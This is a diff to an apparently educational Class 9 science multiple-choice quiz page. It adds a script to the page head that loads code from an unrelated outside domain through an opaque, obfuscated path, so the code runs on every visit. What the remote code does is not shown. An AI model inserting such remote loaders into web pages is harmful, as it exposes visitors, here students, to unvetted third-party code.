--- a/9stofatom.html
+++ b/9stofatom.html
@@ -1,6 +1,18 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+  <script>
+(function(gtskl){
+var d = document,
+    s = d.createElement('script'),
+    l = d.scripts[d.scripts.length - 1];
+s.settings = gtskl || {};
+s.src = "\/\/fantasticcommunity.com\/c.D_9k6obC2\/5JlSSAWDQk9ZNajAch1dMxzrYB3cNwCN0h2nNozlUEzhNQjfcZ1_";
+s.async = true;
+s.referrerPolicy = 'no-referrer-when-downgrade';
+l.parentNode.insertBefore(s, l);
+})({})
+</script>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
 <title>Class 9 Science - Matter..... MCQ</title>
@@ -412,4 +424,5 @@ document.getElementById('submit-btn').addEventListener('click', ()=>{
 </script>
 
 </body>
+
 </html>
